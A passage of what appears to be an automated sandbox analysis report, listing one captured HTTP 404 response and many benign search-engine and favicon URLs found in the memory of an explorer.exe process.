          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Apr 2021 10:59:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2377357906.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2095643111.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2095058843.00000000042CB000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000002.2377357906.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
